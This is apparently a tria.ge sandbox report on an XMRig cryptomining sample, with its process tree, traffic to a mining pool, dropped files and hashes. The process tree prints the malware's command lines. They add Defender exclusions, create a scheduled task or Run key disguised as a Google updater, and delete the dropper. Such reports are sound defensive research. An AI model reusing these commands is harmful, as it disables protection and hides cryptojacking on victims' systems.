Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

11/02/2025, 16:33 UTC

250211-t2ztsstkey 10

11/02/2025, 16:33 UTC

250211-t2zh2atkex 10

11/02/2025, 16:33 UTC

250211-t2yxhatkew 10

11/02/2025, 16:33 UTC

250211-t2nrjasqdk 10

24/10/2024, 20:12 UTC

241024-yyvg5asemn 10

24/10/2024, 20:11 UTC

241024-yygk9ssemk 10

24/10/2024, 20:11 UTC

241024-yygahasemj 10

24/10/2024, 20:11 UTC

241024-yyd55sselq 10

24/10/2024, 20:08 UTC

241024-yw247asdqp 10

24/10/2024, 20:08 UTC

241024-yw1lcssdqn 10

Analysis

  • max time kernel
    1799s
  • max time network
    1791s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/01/2024, 11:19 UTC

General

  • Target

    grhddhsGHswgh/qM5GMXBk6hJE6Y5e (20).exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3436
      • C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (20).exe
        "C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (20).exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2764
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4640
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5080
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (20).exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4376
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1940
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:3964
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:512
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:4568
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
          2⤵
            PID:1396
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:3108
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:184
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          1⤵
            PID:2336
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3948
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
              2⤵
              • Drops file in Program Files directory
              PID:4872
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PATH Win32_VideoController GET Name, VideoProcessor
            1⤵
            • Detects videocard installed
            PID:1828
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
            1⤵
              PID:5032
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k UnistackSvcGroup
              1⤵
                PID:2736

              Network

              • flag-us
                DNS
                241.150.49.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                241.150.49.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                194.178.17.96.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                194.178.17.96.in-addr.arpa
                IN PTR
                Response
                194.178.17.96.in-addr.arpa
                IN PTR
                a96-17-178-194deploystaticakamaitechnologiescom
              • flag-us
                DNS
                14.160.190.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                14.160.190.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                95.221.229.192.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                95.221.229.192.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                232.168.11.51.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                232.168.11.51.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                50.23.12.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                50.23.12.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                171.39.242.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                171.39.242.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                217.135.221.88.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                217.135.221.88.in-addr.arpa
                IN PTR
                Response
                217.135.221.88.in-addr.arpa
                IN PTR
                a88-221-135-217deploystaticakamaitechnologiescom
              • flag-us
                DNS
                pool.hashvault.pro
                conhost.exe
                Remote address:
                8.8.8.8:53
                Request
                pool.hashvault.pro
                IN A
                Response
                pool.hashvault.pro
                IN A
                95.179.241.203
                pool.hashvault.pro
                IN A
                45.76.89.70
              • flag-us
                DNS
                70.89.76.45.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                70.89.76.45.in-addr.arpa
                IN PTR
                Response
                70.89.76.45.in-addr.arpa
                IN PTR
                45768970vultrusercontentcom
              • flag-us
                DNS
                180.178.17.96.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                180.178.17.96.in-addr.arpa
                IN PTR
                Response
                180.178.17.96.in-addr.arpa
                IN PTR
                a96-17-178-180deploystaticakamaitechnologiescom
              • flag-us
                DNS
                23.236.111.52.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                23.236.111.52.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                18.173.189.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                18.173.189.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                183.59.114.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                183.59.114.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                71.159.190.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                71.159.190.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                71.159.190.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                71.159.190.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                241.154.82.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                241.154.82.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                241.154.82.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                241.154.82.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                41.110.16.96.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                41.110.16.96.in-addr.arpa
                IN PTR
                Response
                41.110.16.96.in-addr.arpa
                IN PTR
                a96-16-110-41deploystaticakamaitechnologiescom
              • flag-us
                DNS
                41.110.16.96.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                41.110.16.96.in-addr.arpa
                IN PTR
                Response
                41.110.16.96.in-addr.arpa
                IN PTR
                a96-16-110-41deploystaticakamaitechnologiescom
              • flag-us
                DNS
                198.187.3.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                198.187.3.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                198.187.3.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                198.187.3.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                119.110.54.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                119.110.54.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                119.110.54.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                119.110.54.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                240.221.184.93.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                240.221.184.93.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                240.221.184.93.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                240.221.184.93.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                50.134.221.88.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                50.134.221.88.in-addr.arpa
                IN PTR
                Response
                50.134.221.88.in-addr.arpa
                IN PTR
                a88-221-134-50deploystaticakamaitechnologiescom
              • flag-us
                DNS
                50.134.221.88.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                50.134.221.88.in-addr.arpa
                IN PTR
                Response
                50.134.221.88.in-addr.arpa
                IN PTR
                a88-221-134-50deploystaticakamaitechnologiescom
              • flag-us
                DNS
                211.135.221.88.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                211.135.221.88.in-addr.arpa
                IN PTR
                Response
                211.135.221.88.in-addr.arpa
                IN PTR
                a88-221-135-211deploystaticakamaitechnologiescom
              • flag-us
                DNS
                211.135.221.88.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                211.135.221.88.in-addr.arpa
                IN PTR
                Response
                211.135.221.88.in-addr.arpa
                IN PTR
                a88-221-135-211deploystaticakamaitechnologiescom
              • flag-us
                DNS
                176.178.17.96.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                176.178.17.96.in-addr.arpa
                IN PTR
                Response
                176.178.17.96.in-addr.arpa
                IN PTR
                a96-17-178-176deploystaticakamaitechnologiescom
              • flag-us
                DNS
                176.178.17.96.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                176.178.17.96.in-addr.arpa
                IN PTR
                Response
                176.178.17.96.in-addr.arpa
                IN PTR
                a96-17-178-176deploystaticakamaitechnologiescom
              • 52.142.223.178:80
                156 B
                3
              • 45.76.89.70:3333
                pool.hashvault.pro
                tls
                conhost.exe
                30.1kB
                68.1kB
                242
                183
              • 8.8.8.8:53
                241.150.49.20.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                241.150.49.20.in-addr.arpa

              • 8.8.8.8:53
                194.178.17.96.in-addr.arpa
                dns
                72 B
                137 B
                1
                1

                DNS Request

                194.178.17.96.in-addr.arpa

              • 8.8.8.8:53
                14.160.190.20.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                14.160.190.20.in-addr.arpa

              • 8.8.8.8:53
                95.221.229.192.in-addr.arpa
                dns
                73 B
                144 B
                1
                1

                DNS Request

                95.221.229.192.in-addr.arpa

              • 8.8.8.8:53
                232.168.11.51.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                232.168.11.51.in-addr.arpa

              • 8.8.8.8:53
                50.23.12.20.in-addr.arpa
                dns
                70 B
                156 B
                1
                1

                DNS Request

                50.23.12.20.in-addr.arpa

              • 8.8.8.8:53
                171.39.242.20.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                171.39.242.20.in-addr.arpa

              • 8.8.8.8:53
                217.135.221.88.in-addr.arpa
                dns
                73 B
                139 B
                1
                1

                DNS Request

                217.135.221.88.in-addr.arpa

              • 8.8.8.8:53
                pool.hashvault.pro
                dns
                conhost.exe
                64 B
                96 B
                1
                1

                DNS Request

                pool.hashvault.pro

                DNS Response

                95.179.241.203
                45.76.89.70

              • 8.8.8.8:53
                70.89.76.45.in-addr.arpa
                dns
                70 B
                116 B
                1
                1

                DNS Request

                70.89.76.45.in-addr.arpa

              • 8.8.8.8:53
                180.178.17.96.in-addr.arpa
                dns
                72 B
                137 B
                1
                1

                DNS Request

                180.178.17.96.in-addr.arpa

              • 8.8.8.8:53
                23.236.111.52.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                23.236.111.52.in-addr.arpa

              • 8.8.8.8:53
                18.173.189.20.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                18.173.189.20.in-addr.arpa

              • 8.8.8.8:53
                183.59.114.20.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                183.59.114.20.in-addr.arpa

              • 8.8.8.8:53
                71.159.190.20.in-addr.arpa
                dns
                144 B
                316 B
                2
                2

                DNS Request

                71.159.190.20.in-addr.arpa

                DNS Request

                71.159.190.20.in-addr.arpa

              • 8.8.8.8:53
                241.154.82.20.in-addr.arpa
                dns
                144 B
                316 B
                2
                2

                DNS Request

                241.154.82.20.in-addr.arpa

                DNS Request

                241.154.82.20.in-addr.arpa

              • 8.8.8.8:53
                41.110.16.96.in-addr.arpa
                dns
                142 B
                270 B
                2
                2

                DNS Request

                41.110.16.96.in-addr.arpa

                DNS Request

                41.110.16.96.in-addr.arpa

              • 8.8.8.8:53
                198.187.3.20.in-addr.arpa
                dns
                142 B
                314 B
                2
                2

                DNS Request

                198.187.3.20.in-addr.arpa

                DNS Request

                198.187.3.20.in-addr.arpa

              • 8.8.8.8:53
                119.110.54.20.in-addr.arpa
                dns
                144 B
                316 B
                2
                2

                DNS Request

                119.110.54.20.in-addr.arpa

                DNS Request

                119.110.54.20.in-addr.arpa

              • 8.8.8.8:53
                240.221.184.93.in-addr.arpa
                dns
                146 B
                288 B
                2
                2

                DNS Request

                240.221.184.93.in-addr.arpa

                DNS Request

                240.221.184.93.in-addr.arpa

              • 8.8.8.8:53
                50.134.221.88.in-addr.arpa
                dns
                144 B
                274 B
                2
                2

                DNS Request

                50.134.221.88.in-addr.arpa

                DNS Request

                50.134.221.88.in-addr.arpa

              • 8.8.8.8:53
                211.135.221.88.in-addr.arpa
                dns
                146 B
                278 B
                2
                2

                DNS Request

                211.135.221.88.in-addr.arpa

                DNS Request

                211.135.221.88.in-addr.arpa

              • 8.8.8.8:53
                176.178.17.96.in-addr.arpa
                dns
                144 B
                274 B
                2
                2

                DNS Request

                176.178.17.96.in-addr.arpa

                DNS Request

                176.178.17.96.in-addr.arpa

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Program Files\Google\Chrome\updater.exe

                Filesize

                200KB

                MD5

                2676f63a2ab21398bb0f572b8c462671

                SHA1

                0f59d1de4758c1b576417a030c45ab6cfcfcfef5

                SHA256

                4ff5adc528c62972a037963aa022a19c8a97304b0b6d58c6c72e14fc595ea5f0

                SHA512

                0035f6378c5535176d7683b570eeb2f14c92a181ced6048cac9776c3a9789cef5f37b48bcc2532abcd1d096fc6a8eab7e8a0640355c507cef38e98a24131447e

              • C:\Program Files\Google\Chrome\updater.exe

                Filesize

                235KB

                MD5

                7a9f0f6be3046a71953cf37cf270cc96

                SHA1

                bfd444fbacc73c2437e5ac8022eeb75c61b0ed52

                SHA256

                3ad002218cba2b2c084c0ba2a09906bd4844d54308a1f6643c7b1a3baedf8258

                SHA512

                1b80603d91b680f5eb08d698b595f171b84aa1fcca330ff13ac67cad6f5bb8734b2775f77ea021e3b50f38580ea9ba7929fab5a3611cf08f255377ca706de6db

              • C:\Program Files\Google\Libs\g.log

                Filesize

                226B

                MD5

                fdba80d4081c28c65e32fff246dc46cb

                SHA1

                74f809dedd1fc46a3a63ac9904c80f0b817b3686

                SHA256

                b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

                SHA512

                b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                Filesize

                2KB

                MD5

                d85ba6ff808d9e5444a4b369f5bc2730

                SHA1

                31aa9d96590fff6981b315e0b391b575e4c0804a

                SHA256

                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                SHA512

                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                6d42b6da621e8df5674e26b799c8e2aa

                SHA1

                ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                SHA256

                5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                SHA512

                53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                04dab1e7226930c3346286e214d84945

                SHA1

                86718b6314c8e64616e9694736da495d3e2ae4be

                SHA256

                0fe043e925e73fa82b319b13b93bf563834e56d520a3c793c78655c8988b439d

                SHA512

                98e153baebbac0d5d20468e6abe70bb5dd7723bc5a03ae6164cb48e4921e2fb910cfb36bdb63c0ca18746bc9839d50cc353d092f98ac50739c108b35b3fe78a0

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cwxfezce.zye.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                Filesize

                4KB

                MD5

                bdb25c22d14ec917e30faf353826c5de

                SHA1

                6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                SHA256

                e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                SHA512

                b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                b42c70c1dbf0d1d477ec86902db9e986

                SHA1

                1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                SHA256

                8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                SHA512

                57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

              • memory/184-133-0x00007FF682220000-0x00007FF682236000-memory.dmp

                Filesize

                88KB

              • memory/184-126-0x00007FF682220000-0x00007FF682236000-memory.dmp

                Filesize

                88KB

              • memory/512-88-0x00007FFFE7DC0000-0x00007FFFE8881000-memory.dmp

                Filesize

                10.8MB

              • memory/512-79-0x0000020C21BA0000-0x0000020C21BBC000-memory.dmp

                Filesize

                112KB

              • memory/512-85-0x0000020C21530000-0x0000020C21540000-memory.dmp

                Filesize

                64KB

              • memory/512-84-0x0000020C21BE0000-0x0000020C21BEA000-memory.dmp

                Filesize

                40KB

              • memory/512-82-0x0000020C21B80000-0x0000020C21B88000-memory.dmp

                Filesize

                32KB

              • memory/512-83-0x0000020C21B90000-0x0000020C21B96000-memory.dmp

                Filesize

                24KB

              • memory/512-81-0x0000020C21BC0000-0x0000020C21BDA000-memory.dmp

                Filesize

                104KB

              • memory/512-77-0x0000020C21980000-0x0000020C21A35000-memory.dmp

                Filesize

                724KB

              • memory/512-75-0x0000020C21530000-0x0000020C21540000-memory.dmp

                Filesize

                64KB

              • memory/512-76-0x0000020C21500000-0x0000020C2151C000-memory.dmp

                Filesize

                112KB

              • memory/512-80-0x0000020C21520000-0x0000020C2152A000-memory.dmp

                Filesize

                40KB

              • memory/512-78-0x0000020C08FF0000-0x0000020C08FFA000-memory.dmp

                Filesize

                40KB

              • memory/512-65-0x0000020C21530000-0x0000020C21540000-memory.dmp

                Filesize

                64KB

              • memory/512-64-0x0000020C21530000-0x0000020C21540000-memory.dmp

                Filesize

                64KB

              • memory/512-63-0x00007FFFE7DC0000-0x00007FFFE8881000-memory.dmp

                Filesize

                10.8MB

              • memory/1396-146-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-158-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-188-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-186-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-184-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-182-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-180-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-178-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-176-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-174-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-172-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-170-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-168-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-166-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-164-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-162-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-160-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-156-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-154-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-152-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-119-0x000002E6D0590000-0x000002E6D05B0000-memory.dmp

                Filesize

                128KB

              • memory/1396-150-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-148-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-144-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-120-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-125-0x000002E6D0CA0000-0x000002E6D0CC0000-memory.dmp

                Filesize

                128KB

              • memory/1396-142-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-127-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-129-0x000002E6D0CE0000-0x000002E6D0D00000-memory.dmp

                Filesize

                128KB

